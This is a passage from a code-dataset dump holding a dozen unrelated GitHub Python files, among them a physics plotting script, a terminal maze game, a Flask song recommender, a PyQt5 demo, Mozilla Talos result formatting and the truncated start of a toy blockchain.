= np.pi/4\r\n\r\n'''solving for material L'''\r\n# for t in trange(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)):\r\n# func.E0 = Es[j]\r\n# func.E = func.E0 + 1j*func.deltaE\r\n# func.b = func.calc_b(func.E/np.tanh(1.74*np.sqrt( beta_prime - 1 )))\r\n# func.tb = -func.b \r\n# func.set_up_gmL(func,func.gm_BCS, phi/2)\r\n# func.set_up_gmR(func,func.gm_BCS, -phi/2)\r\n# yv_init = np.zeros((32,func.nx), dtype = complex)\r\n# func.sovle_single_E_general(func,yv_init,f'{filename}_first_E{j}_beta{t}', save = 'only_y')\r\n\r\n# for t in range(len(betas_prime)):\r\n# for j in range(len(Es)):\r\n# E = Es[j]\r\n# y = np.load(f'data2/{filename}_first_E{j}_beta{t}_y.npy')\r\n# middle_index_1 = int(len(y[0])/2) \r\n# ym = data.v_to_m(y)\r\n# np.save(f'data2/{filename}_middle_E{j}_beta{t}.npy',ym[:,:,:,middle_index_1]) \r\n \r\n'''Rashba interface parameters''' \r\nfunc.h0 = np.array([0,0,0])\r\nfunc.pref1 = 0.1\r\nfunc.pref2 = 0.1\r\nfunc.pref3 = 0.1\r\nfunc.omega = 0.1\r\nfunc.bc_left = func.Rashba_bc\r\nfunc.bc_right = func.bc_KL\r\nfunc.L = 8\r\nfunc.x = np.linspace(0,func.L,func.nx)\r\n\r\n'''solving for material R'''\r\n# for t in trange(len(betas_prime)): \r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)):\r\n# E 
= Es[j]\r\n# func.E0 = E\r\n# func.E = E + 1j*func.deltaE\r\n# func.b = func.calc_b(func.E/np.tanh(1.74*np.sqrt( beta_prime - 1 )))\r\n# func.tb = - func.b\r\n# func.set_up_gmL_from_file(func,f'data2/{filename}_middle_E{j}_beta{t}.npy')\r\n# func.set_up_gmR(func,func.gm_vacum)\r\n# func.sovle_single_E_general(func,yv_init,f'{filename}_sencond_E{j}_beta{t}', save = 'only_y')\r\n\r\n\r\n'''plotting magnetization'''\r\n# dmxL = np.zeros((len(Es),len(betas_prime),func.nx))\r\n# mxL = np.zeros((len(betas_prime),func.nx))\r\n# for t in trange(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)): \r\n# y = np.load(f'data2/{filename}_sencond_E{j}_beta{t}_y.npy')\r\n# ym = data.v_to_m(y)\r\n# fsi, dxi, dyi, dzi, tfsi, tdxi, tdyi, tdzi = data.calc_f_from_gamma(ym)\r\n# mx = np.real(fsi*tdxi - tfsi*dxi) \r\n# dmxL[j,t] = mx*np.tanh(1.76*beta_prime*Es[j]/2)\r\n# mxL[t,:] = sp.integrate.simps(dmxL[:,t,:], Es, axis = 0) \r\n# np.save(f'data2/{filename}_mx_of_T.npy',mxL)\r\n'''Loading'''\r\nmxL = np.load(f'data2/{filename}_mx_of_T.npy')\r\n\r\nplt.figure()\r\n#plt.title('mx')\r\nplt.plot(1/betas_prime[:-2],-mxL[:-2,-1])\r\nplt.hlines(0,0,1)\r\nplt.yscale(\"log\")\r\nplt.ylabel(r'$M_x/M_0$')\r\nplt.xlabel(r'$T/T_c$')\r\nplt.savefig(\"plots/singlet new mx of T.pdf\", bbox_inches=\"tight\", format=\"pdf\")\r\nplt.savefig(\"plots/singlet new mx of T.svg\", bbox_inches=\"tight\", format=\"svg\")\r\nplt.show()\r\n\r\n'''plotting current'''\r\n# dJL = np.zeros((len(Es),len(betas_prime)))\r\n# JL = np.zeros(len(betas_prime))\r\n# for t in range(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)): \r\n# y = np.load(f'data2/{filename}_first_E{j}_beta{t}_y.npy')\r\n# ym = data.v_to_m(y)\r\n# J, Jsx, Jsy, Jsz, I_simp, ISx_simp, ISy_simp, ISz_simp,dfs,ddx,ddy,ddz,dtfs,dtdx,dtdy,dtdz,I_fs, I_dx, I_dy, I_dz = data.currents(ym)\r\n# dJL[j,t] = J[int(func.nx/2)]\r\n# JL[t] = sp.integrate.simps(dJL[:,t]*np.tanh(1.76*beta_prime*Es/2), Es, axis = 0) \r\n# np.save(f'data2/{filename}_J_of_T.npy',JL)\r\n'''loading'''\r\nJL = np.load(f'data2/{filename}_J_of_T.npy')\r\n\r\nplt.figure(figsize = (6,6))\r\nplt.title('current')\r\nplt.plot(1/betas_prime[0:],JL[0:])\r\nplt.hlines(0,0,1)\r\nplt.show()\r\n\r\n\r\n'''plot magnetization as a function of T and y'''\r\nX,Y = np.meshgrid(Ts,func.x)\r\nZ = mxL \r\nZmax = np.max(np.abs(mxL))\r\nplt.figure(figsize = (6,6))\r\nplt.title(f'mx at phi {phi}')\r\nplt.imshow(Z.T,vmax = Zmax, vmin = -Zmax, cmap = cm.RdBu,aspect='auto', interpolation='nearest')\r\nplt.colorbar()\r\nplt.show()\r\n\r\nplt.plot(func.x, mxL[2])\r\nplt.show()\r\n\r\n'''plot integrand'''\r\nX, Y = np.meshgrid(func.x,Es)\r\nZ = dmxL[:,0,:]\r\nZmax = np.max(np.abs(Z))\r\nplt.pcolormesh(X,Y,Z,vmax = Zmax, vmin = -Zmax, cmap = cm.RdBu)\r\nplt.colorbar()\r\nplt.show()\r\n\r\n# plt.plot(Es,dmxL[:,0,0])\r\n# '''plot mx as a function of y for one T'''\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sigriaun/Supercurrent-induced-proximity-effects-at-spin-orbit-coupled-interfaces","sub_path":"mx as a function of temperature.py","file_name":"mx as a function of temperature.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"935804291","text":"import random\nimport time\nimport os\nfrom colorconsole import terminal\nfrom Camera import Camera\nfrom Loader import Loader\nfrom Vector2 import Vector2\nfrom WinScreen import WinScreen\n\nclass Runner():\n\tdef __init__(self, actions, 
loaded_map, map_name, size=Vector2(200, 55), is_maze=False):\n\t\tobjects = loaded_map.objects\n\t\tself.map_name = map_name\n\t\tself.initial_pos = loaded_map.player_pos\n\t\tself.initial_rotation = loaded_map.player_rotation\n\t\tself.escaped = False\n\n\t\tself.camera = Camera(self, self.initial_pos, self.initial_rotation, size)\n\t\tself.camera.update_objects(objects)\n\t\t# self.camera.update()\n\t\tself.map_ = self.camera.send_screen()\n\n\t\tself.actions = actions\n\t\tself.size = size\n\n\t\tself.walk_speed = 2\n\t\tself.sprint_speed = 5\n\t\tself.player_speed = self.walk_speed\n\t\tself.player_rotation_speed = 90\n\n\t\tself.elapsed_time = 0\n\t\tself.last_time = time.time()\n\t\tself.start_time = time.time()\n\n\t\tself.loaded_map = loaded_map\n\t\tself.is_maze = is_maze\n\t\tself.map_on = True\n\t\tif is_maze:\n\t\t\tself.visual_map = str(loaded_map).split(\"\\n\")\n\t\t\tself.maze_size = Vector2(loaded_map.w, loaded_map.h)\n\t\t\tself.map_name += \" maze\"\n\n\t\tself.fps_counter = 0\n\t\tself.last_measurement_time = time.time()\n\n\tdef print_map(self):\n\t\t# Go to upper left corner\n\t\tprint(\"\\033[0;0H\")\n\t\tprint()\n\n\t\t# Minimap rendering\n\t\tif self.is_maze:\n\t\t\tself.loaded_map.update_player_pos(self.camera.pos)\n\t\t\tself.visual_map = str(self.loaded_map).split(\"\\n\")\n\n\t\t# Output the horizontal line\n\t\tfor y in range(len(self.map_)):\n\t\t\tstrip = \"\".join(self.map_[y])\n\t\t\tif self.is_maze and y <= self.maze_size.y and self.map_on:\n\t\t\t\tstrip = \" \" + self.visual_map[y] + strip[self.maze_size.x * 2 + 5:]\n\t\t\tprint(strip)\n\n\t\t# Output FPS count for debugging purposes\n\t\tfps_sample = 20\n\t\tself.fps_counter += 1\n\t\tif self.fps_counter >= fps_sample:\n\t\t\tself.fps_counter = 0\n\t\t\ttime_taken = time.time() - self.last_measurement_time\n\t\t\tself.last_measurement_time = time.time()\n\t\t\tfps = fps_sample / time_taken\n\t\t\tprint(\" FPS:\", int(fps), \" | \", len(self.camera.objects), \"walls | \", len(self.camera.loaded_objects), \"loaded walls \")\n\n\t\t# print(\" FPS:\", int(1 / self.elapsed_time), \" \")\n\n\tdef clear_screen(self):\n\t\tprint(\"\\033[0;0H\")\n\t\tx, y = os.get_terminal_size()\n\t\tprint((\" \" * x + \"\\n\") * y)\n\t\tprint(\"\\033[0;0H\")\n\n\tdef update(self):\n\t\t# Calculate the time since the last frame\n\t\tself.elapsed_time = time.time() - self.last_time\n\t\tself.last_time = time.time()\t\t\n\n\t\t# Check if ESCAPE was pressed\n\t\tif self.actions.has(\"quit\"):\n\t\t\tself.clear_screen()\n\t\t\tquit()\n\n\t\t# Move player\n\t\tself.player_movement()\n\n\t\t# Check if the maze was completed\t\t\n\t\tif self.escaped:\n\t\t\treturn WinScreen(self.actions, self.map_name,\n\t\t\t\ttime.time() - self.start_time, self.size)\n\n\t\t# RENDER THE IMAGE\n\t\tself.camera.update(self.elapsed_time)\n\n\t\t# output the rendered image\n\t\tself.print_map()\n\n\t\treturn self\n\n\tdef player_movement(self):\n\t\tif self.actions.has(\"sprint\"):\n\t\t\tself.player_speed = self.sprint_speed\n\t\telse:\n\t\t\tself.player_speed = self.walk_speed\n\n\t\tif self.actions.has(\"left\"):\n\t\t\tself.camera.rotation += self.player_rotation_speed * self.elapsed_time\n\t\t\tself.camera.rotation %= 360\n\t\tif self.actions.has(\"right\"):\n\t\t\tself.camera.rotation -= self.player_rotation_speed * self.elapsed_time\n\t\t\tself.camera.rotation %= 360\n\t\tif self.actions.has(\"back\"):\n\t\t\tself.camera.move(-self.player_speed * self.elapsed_time)\n\t\tif self.actions.has(\"forward\"):\n\t\t\tself.camera.move(self.player_speed 
* self.elapsed_time)\n\n\t\tif self.actions.has(\"toggle_map\"):\n\t\t\tself.map_on = not self.map_on\n\t\t\tself.actions.remove(\"toggle_map\")\n\n\tdef escape(self):\n\t\tself.escaped = True","repo_name":"oONemOo/Project_mango","sub_path":"Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36907710997","text":"from MachLearnModule.cluster_network import ClusterNetwork as cluster\nfrom SpotifyModule.spotifyHandler import SpotifyHandler as spotify\nfrom CrawlerModule.WebCrawler import WebCrawler as crawler\n\n\nfrom flask import Flask, render_template\nfrom flask.globals import request\nfrom werkzeug.utils import redirect\n\n\n\n\nflask_app = Flask(__name__)\n\n \n\n\n'''\ninit spotify account\ninit kmean network\n'''\nspoty = spotify()\nsongs = []\nclust = cluster()\ncraw = crawler()\n\nhot_songs = craw.get_songs_from_tabel()\nprint(hot_songs)\nis_in_hot_list = ''\nrecommend=\"\"\nsearch_string = ''\n\ndef get_recommend(search_id):\n print('search_id',search_id)\n if search_id != 'search_song':\n res = spoty.get_title_features(search_id)\n result = clust.get_cluster_from_new_input(res)\n result = list(result)\n return 'https://open.spotify.com/embed/track/'+result[0]+'?utm_source=generator'\n\n\nr = spoty.search_for_song('heros david')\n\nres =spoty.get_title_features(r[0][-1])[0]\n\nsongs.append('https://open.spotify.com/embed/track/'+res['id']+'?utm_source=generator') \n#songs_id.append(res['id'])\n@flask_app.route('/', methods=['GET','POST'])\ndef index():\n search_string = ''\n \n if request.method == 'POST':\n if request.form['button'] == 'search_song':\n search_string = request.form['search_text']\n res = spoty.search_for_song(search_string)\n songs.clear()\n for r in res:\n songs_id = r[-1].split(':')[-1]\n songs.append([\"https://open.spotify.com/embed/track/\"+r[-1].split(':')[-1]+\"?utm_source=generator\", songs_id])\n \n if request.form.get('button'):\n res_id = request.form['button']\n recommend = get_recommend(res_id)\n if str(search_string).lower() in hot_songs:\n is_in_hot_list = 'Yeahh, hot list'\n else:\n is_in_hot_list = ''\n return render_template('home.html', \n title = \"Music Referender\",\n description=\"Smart page for music recomandation\",\n hotlist=is_in_hot_list,\n songs=songs,\n recommend=recommend\n )\n\n else: \n return render_template( \n 'home.html', \n title = \"Music Referender\",\n description=\"Smart page for music recomandation\",\n songs=songs\n )\n\n\n\n\nif __name__ == \"__main__\":\n flask_app.run(debug=True)","repo_name":"Denny-Meyer/IronHack_Song_Recommender","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2560351906","text":"# 저번에 풀어본 문제여서 교수님 풀이로 풀어봄\n# 빨강(1번) 다음에는 파랑(2번)이 와야한다.\n# => 즉 2번을 찾고 직전(prev)가 1번이면 answer ++;\n# 그 후에 prev <- n 갱신\n\nt = 10\nfor tc in range(1, t+1):\n n = int(input()) # 줄\n arr = [input().split() for _ in range(n)]\n ans = 0\n for st in zip(*arr):\n ans += \"\".join(st).replace('0','').count('12')\n\n print(f\"#{tc} {ans}\")\n","repo_name":"ninnistic/algorithm","sub_path":"Baekjoon/3003.py","file_name":"3003.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72777512215","text":"## Read me ##\r\n## This script was made to get 2 lists 
from 2 different files and get the difference between them ##\r\ndef compareDocuments():\r\n\r\n    smaller_list = []\r\n    file = open(\"C:\\Code\\smaller_list.txt\", \"r\")\r\n    for item in file:\r\n        smaller_list.append(item)\r\n\r\n    list_all = []\r\n    file_all = open(\"C:\\Code\\Bigger_list.txt\", \"r\")\r\n    for item in file_all:\r\n        list_all.append(item)\r\n\r\n    difference = []\r\n\r\n    for total in list_all:\r\n        have = False\r\n        for smaller_item in smaller_list:\r\n            if total == smaller_item:\r\n                have = True\r\n                break\r\n        if not have:\r\n            difference.append(total)\r\n\r\n\r\n    with open('list_avg.txt', 'w') as f:\r\n        for item in difference:\r\n            f.write(item)\r\n\r\nif __name__ == \"__main__\":\r\n    compareDocuments()","repo_name":"danielcampanha/Python_BigDataCorp","sub_path":"CompareDocs.py","file_name":"CompareDocs.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"7302595884","text":"import random\n\nimport pygame\n\nfrom dot_blaster import colors\nfrom dot_blaster.constants import FPS, HEIGHT, WIDTH\nfrom dot_blaster.enemy import Enemy\nfrom dot_blaster.physics import GamePhysicsHandler\nfrom dot_blaster.planet import Planet\nfrom dot_blaster.ui import TitleMenu\n\n\ndef start_game_test():\n    print(\"START\")\n\n\ndef test_enemy():\n    pygame.init()\n    screen = pygame.display.set_mode((WIDTH, HEIGHT))\n    title_menu = TitleMenu(screen, start_game_test)\n\n    while True:\n        for event in pygame.event.get():\n            if (\n                event.type == pygame.QUIT\n                or event.type == pygame.KEYDOWN\n                and event.key == pygame.K_ESCAPE\n            ):\n                exit()\n            elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:\n                pygame.image.save(screen, \"planet.png\")\n\n        # 'planet' in the center of screen\n        screen.fill(pygame.Color(\"black\"))\n        title_menu.run_game()\n\n        pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n    test_enemy()\n","repo_name":"avivajpeyi/ludum_dare_49","sub_path":"test/test_title_screen.py","file_name":"test_title_screen.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} 
+{"seq_id":"41265290471","text":"import bucketsorter as bucketer\nimport json\nimport sys #testing\n\n\n# wrapped in this function just to more easily swap in various files\ndef purchase_data_into_buckets(purchase_csv,buckets_csv,output_name):\n\t# [[purchase line one],[purchase line 2],etc...]\n\tpurchase_data = bucketer.getPurchaseRecords(purchase_csv)\n\n\t# {1:bucket1,2:bucket2,etc...}\n\tbuckets = bucketer.getBuckets(buckets_csv)\n\n\t# {publisher1:{bucket data + index}, publisher2:{bucket data + index}, etc...}\n\tsorted_buckets = bucketer.sortBuckets(buckets)\n\n\t# trim out the internal index, don't need it anymore, used for sort\n\tbuckets = [buckets[b][0:4] for b in buckets] \n\n\t# puts together the json\n\tfor purchase in purchase_data:\n\t\tindex = bucketer.possibleMatches(purchase,sorted_buckets)\n\t\tpurchase_string = \",\".join(p for p in purchase)\n\t\tbuckets[index][3][\"purchases\"].append(purchase_string)\n\n\tjson_data = []\n\tfor bucket in buckets:\n\t\tjson_data.append( {\"bucket\": ','.join(bucket[:3]), \"purchases\":[bucket[3]['purchases']]} )\n\n\twith open(output_name, 'w') as outfile:\n\t\tjson.dump(json_data, outfile)\n\t# print 
json.dumps(json_data)\n\n\n\npurchase_data_into_buckets('purchase_data.csv','purchase_buckets.csv','output.txt')\npurchase_data_into_buckets('test_purchase.csv','test_buckets.csv','test_output.txt')\n\n","repo_name":"JoshKK-projects/bucket_sorting","sub_path":"bucket_sorting.py","file_name":"bucket_sorting.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21549263599","text":"import os\nimport sys\nimport logging\nimport logging.handlers\n\n\nDEBUG_LOG_FOLDER = os.path.join(os.getcwd(), \"Debug\")\nDEBUG_LOG_FILE = os.path.join(DEBUG_LOG_FOLDER, \"debug.log\")\nDEBUG_LOGGER_NAME = \"debug_log\"\n\nif not os.path.exists(DEBUG_LOG_FOLDER):\n os.makedirs(DEBUG_LOG_FOLDER)\n\n\nclass CustomFormatter(logging.Formatter):\n \"\"\" \"\"\"\n\n def __init__(self, fmt=\"%(asctime)s - %(levelname)s - %(message)s\", datefmt='<%m/%d/%Y %H:%M:%S>'):\n logging.Formatter.__init__(self, fmt=fmt, datefmt=datefmt)\n\n def format(self, record):\n\n # Remember the original format\n format_orig = self._style._fmt\n\n if record.levelno == logging.ERROR:\n self._style._fmt = \"%(asctime)s - %(levelname)s - %(module)s.%(funcName)s - %(message)s\"\n\n # Calling the original formatter once the style has changed\n result = logging.Formatter.format(self, record)\n\n # Restore the original format\n self._style._fmt = format_orig\n\n return result\n\n\n# Create the shared logger\nshared_logger = logging.getLogger(DEBUG_LOGGER_NAME)\nshared_logger.setLevel(logging.DEBUG)\n\n# Create a file handler for the shared logger\nhandlers = {\n logging.handlers.TimedRotatingFileHandler(\n DEBUG_LOG_FILE, when='D', interval=1, backupCount=7, utc=True),\n logging.StreamHandler(sys.stdout),\n}\n\nformatter = CustomFormatter()\n\nfor handler in handlers:\n handler.setFormatter(formatter)\n shared_logger.addHandler(handler)\n\n\ndef create_logger():\n logger = logging.getLogger(DEBUG_LOGGER_NAME)\n return logger\n","repo_name":"bstaple1/MTGA_Draft_17Lands","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"68"} +{"seq_id":"9037887990","text":"\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"output formats for Talos\"\"\"\n\nimport filter\nimport json\nimport utils\n\nfrom mozlog import get_proxy_logger\n\n# NOTE: we have a circular dependency with output.py when we import results\nimport results as TalosResults\n\nLOG = get_proxy_logger()\n\n\ndef filesizeformat(bytes):\n \"\"\"\n Format the value like a 'human-readable' file size (i.e. 
13 KB, 4.1 MB, 102\n bytes, etc).\n \"\"\"\n bytes = float(bytes)\n formats = ('B', 'KB', 'MB')\n for f in formats:\n if bytes < 1024:\n return \"%.1f%s\" % (bytes, f)\n bytes /= 1024\n return \"%.1fGB\" % bytes # has to be GB\n\n\nclass Output(object):\n \"\"\"abstract base class for Talos output\"\"\"\n\n @classmethod\n def check(cls, urls):\n \"\"\"check to ensure that the urls are valid\"\"\"\n\n def __init__(self, results):\n \"\"\"\n - results : TalosResults instance\n \"\"\"\n self.results = results\n\n def __call__(self):\n suites = []\n test_results = {\n 'framework': {\n 'name': self.results.results[0].framework,\n },\n 'suites': suites,\n }\n\n for test in self.results.results:\n # serialize test results\n tsresult = None\n if not test.using_xperf:\n subtests = []\n suite = {\n 'name': test.name(),\n 'subtests': subtests,\n }\n\n if self.results.extra_options:\n suite['extraOptions'] = self.results.extra_options\n\n suites.append(suite)\n vals = []\n replicates = {}\n\n # TODO: counters!!!! we don't have any, but they suffer the\n # same\n for result in test.results:\n # XXX this will not work for manifests which list\n # the same page name twice. It also ignores cycles\n for page, val in result.raw_values():\n if page == 'NULL':\n page = test.name()\n if tsresult is None:\n tsresult = r = TalosResults.Results()\n r.results = [{'index': 0, 'page': test.name(),\n 'runs': val}]\n else:\n r = tsresult.results[0]\n if r['page'] == test.name():\n r['runs'].extend(val)\n replicates.setdefault(page, []).extend(val)\n\n tresults = [tsresult] if tsresult else test.results\n\n for result in tresults:\n filtered_results = \\\n result.values(suite['name'],\n test.test_config['filters'])\n vals.extend([[i['value'], j] for i, j in filtered_results])\n for val, page in filtered_results:\n if page == 'NULL':\n # no real subtests\n page = test.name()\n subtest = {\n 'name': page,\n 'value': val['filtered'],\n 'replicates': replicates[page],\n }\n subtests.append(subtest)\n if test.test_config.get('lower_is_better') is not None:\n subtest['lowerIsBetter'] = \\\n test.test_config['lower_is_better']\n if test.test_config.get('alert_threshold') is not None:\n subtest['alertThreshold'] = \\\n test.test_config['alert_threshold']\n if test.test_config.get('unit'):\n subtest['unit'] = test.test_config['unit']\n\n # if there is more than one subtest, calculate a summary result\n if len(subtests) > 1:\n suite['value'] = self.construct_results(\n vals, testname=test.name())\n if test.test_config.get('lower_is_better') is not None:\n suite['lowerIsBetter'] = \\\n test.test_config['lower_is_better']\n if test.test_config.get('alert_threshold') is not None:\n suite['alertThreshold'] = \\\n test.test_config['alert_threshold']\n\n # counters results_aux data\n counter_subtests = []\n for cd in test.all_counter_results:\n for name, vals in cd.items():\n # We want to add the xperf data as talos_counters\n # exclude counters whose values are tuples (bad for\n # graphserver)\n if len(vals) > 0 and isinstance(vals[0], list):\n continue\n\n # mainthread IO is a list of filenames and accesses, we do\n # not report this as a counter\n if 'mainthreadio' in name:\n continue\n\n # responsiveness has it's own metric, not the mean\n # TODO: consider doing this for all counters\n if 'responsiveness' is name:\n subtest = {\n 'name': name,\n 'value': filter.responsiveness_Metric(vals)\n }\n counter_subtests.append(subtest)\n continue\n\n subtest = {\n 'name': name,\n 'value': 0.0,\n }\n counter_subtests.append(subtest)\n\n if 
test.using_xperf:\n if len(vals) > 0:\n subtest['value'] = vals[0]\n else:\n # calculate mean value\n if len(vals) > 0:\n varray = [float(v) for v in vals]\n subtest['value'] = filter.mean(varray)\n if counter_subtests:\n suites.append({'name': test.name(),\n 'subtests': counter_subtests})\n return test_results\n\n def output(self, results, results_url, tbpl_output):\n \"\"\"output to the a file if results_url starts with file://\n - results : json instance\n - results_url : file:// URL\n \"\"\"\n\n # parse the results url\n results_url_split = utils.urlsplit(results_url)\n results_scheme, results_server, results_path, _, _ = results_url_split\n\n if results_scheme in ('http', 'https'):\n self.post(results, results_server, results_path, results_scheme,\n tbpl_output)\n elif results_scheme == 'file':\n with open(results_path, 'w') as f:\n for result in results:\n f.write(\"%s\\n\" % result)\n else:\n raise NotImplementedError(\n \"%s: %s - only http://, https://, and file:// supported\"\n % (self.__class__.__name__, results_url)\n )\n\n # This is the output that treeherder expects to find when parsing the\n # log file\n if 'spsProfile' not in self.results.extra_options:\n LOG.info(\"PERFHERDER_DATA: %s\" % json.dumps(results))\n if results_scheme in ('file'):\n json.dump(results, open(results_path, 'w'), indent=2,\n sort_keys=True)\n\n def post(self, results, server, path, scheme, tbpl_output):\n raise NotImplementedError(\"Abstract base class\")\n\n @classmethod\n def shortName(cls, name):\n \"\"\"short name for counters\"\"\"\n names = {\"Working Set\": \"memset\",\n \"% Processor Time\": \"%cpu\",\n \"Private Bytes\": \"pbytes\",\n \"RSS\": \"rss\",\n \"XRes\": \"xres\",\n \"Modified Page List Bytes\": \"modlistbytes\",\n \"Main_RSS\": \"main_rss\"}\n return names.get(name, name)\n\n @classmethod\n def isMemoryMetric(cls, resultName):\n \"\"\"returns if the result is a memory metric\"\"\"\n memory_metric = ['memset', 'rss', 'pbytes', 'xres', 'modlistbytes',\n 'main_rss', 'content_rss'] # measured in bytes\n return bool([i for i in memory_metric if i in resultName])\n\n @classmethod\n def v8_Metric(cls, val_list):\n results = [i for i, j in val_list]\n score = 100 * filter.geometric_mean(results)\n return score\n\n @classmethod\n def JS_Metric(cls, val_list):\n \"\"\"v8 benchmark score\"\"\"\n results = [i for i, j in val_list]\n LOG.info(\"javascript benchmark\")\n return sum(results)\n\n @classmethod\n def CanvasMark_Metric(cls, val_list):\n \"\"\"CanvasMark benchmark score (NOTE: this is identical to JS_Metric)\"\"\"\n results = [i for i, j in val_list]\n LOG.info(\"CanvasMark benchmark\")\n return sum(results)\n\n def construct_results(self, vals, testname):\n if 'responsiveness' in testname:\n return filter.responsiveness_Metric([val for (val, page) in vals])\n elif testname.startswith('v8_7'):\n return self.v8_Metric(vals)\n elif testname.startswith('kraken'):\n return self.JS_Metric(vals)\n elif testname.startswith('tcanvasmark'):\n return self.CanvasMark_Metric(vals)\n elif len(vals) > 1:\n return filter.geometric_mean([i for i, j in vals])\n else:\n return filter.mean([i for i, j in vals])\n","repo_name":"mozilla/positron","sub_path":"testing/talos/talos/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":9934,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"} +{"seq_id":"6335032483","text":"import os\nimport shutil\nfrom PIL import Image\nfrom tqdm import tqdm\n# 遍历文件夹\ndef iter_files(old_path, new_path):\n # 
walk the root directory; each subfolder name becomes the group prefix\n    for root, dirs, files in os.walk(old_path):\n        for file in files:\n            group = root.split(\"\\\\\")[-1]\n            # file_name = os.path.join(root, file)\n            path1 = os.path.join(root, file)\n            print(\"path1\", path1)\n            # print(path1.size())\n            path2 = os.path.join(new_path, group + \"_\" + file)\n            print(\"path2\",path2)\n            shutil.copy(path1, path2)\n    print(\"finished\")\n    exit(0)\ndef print_imgsize(path1):\n    # tif_list = [x for x in os.listdir(path) if x.endswith(\".tiff\")]\n    # l = sorted(tif_list)\n    # print(l)\n    for file in os.listdir(path1):\n        im = Image.open(os.path.join(path1, file)) # returns an Image object\n        print(file, \"=====\", im.size)\n        # print('width: %d, height: %d' % (im.size[0], im.size[1]))\ndef print_2imgsize(path1, path2):\n    info1 = []\n    for file in os.listdir(path1):\n        im = Image.open(os.path.join(path1, file)) # returns an Image object\n        size = im.size\n        info1.append(file + \"===\" + str(size))\n    info2 = []\n    for file in os.listdir(path2):\n        im = Image.open(os.path.join(path2, file)) # returns an Image object\n        size = im.size\n        info2.append(file + \"===\" + str(size))\n\n    for i in range(len(info2)):\n        print(info2[i], \"====\", info1[i])\nif __name__ == '__main__':\n    src_path = r\"H:\\海康_全要素\\hk_drone\"\n    save_path = r\"H:\\海康_全要素\\drone\\poly\"\n    path2 = r\"H:\\海康_全要素\\drone\\poly\"\n    # iter_files(src_path, save_path)\n    # print_imgsize(save_path)\n    print_2imgsize(save_path, path2)","repo_name":"richerd0703/python_tool","sub_path":"useful_code/more_dir_file.py","file_name":"more_dir_file.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"26223488295","text":"'''\n106-QButtonGroup - removing a button\n\nRemoving one of the buttons from a button group takes it out of the group; it does not delete the button.\n\nAPI:\n    removeButton(QAbstractButton) -- remove the given button from the group\n'''\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QRadioButton, QButtonGroup\n\n\nclass Window(QWidget):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self.setWindowTitle('106_QButtonGroup_移除按钮')\n        self.resize(1000, 500)\n\n        '''Initialize a group of radio buttons'''\n        rb_man = QRadioButton('男', self)\n        rb_woman = QRadioButton('女', self)\n        rb_man.move(10, 10)\n        rb_woman.move(70, 10)\n        sex_group = QButtonGroup(self)\n        sex_group.addButton(rb_man)\n        sex_group.addButton(rb_woman)\n\n        '''Remove one of the buttons from the button group'''\n        # If the line below takes effect, the two buttons will no longer be mutually exclusive\n        sex_group.removeButton(rb_man)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n\n    window = Window()\n    window.show()\n\n    sys.exit(app.exec_())\n","repo_name":"anyuhanfei/study_PyQt5","sub_path":"104~109-QButtonGroup/106-QButtonGroup-移除按钮.py","file_name":"106-QButtonGroup-移除按钮.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} 
+{"seq_id":"19879752686","text":"import hashlib\nimport time\n\nfrom signature import *\nfrom sync import synchronize_chain, listen_for_requests\n\nport = 8080\noutro_host = '192.168.0.100' # IP address of the other node\noutro_port = 5000 # port the other node is listening on\n\nclass Transaction:\n    def __init__(self, sender, recipient, amount):\n        self.sender = sender\n        self.recipient = recipient\n        self.amount = amount\n        self.signature = None\n\n    def __str__(self):\n        return f\"Sender: {self.sender}, Recipient: {self.recipient}, Amount: {self.amount}, Signature: {self.signature}\"\n\n\nclass Block:\n    def __init__(self, index, timestamp, transactions, data, previous_hash, nonce=0):\n        self.index = index\n        self.timestamp = timestamp\n        self.transactions = transactions\n        
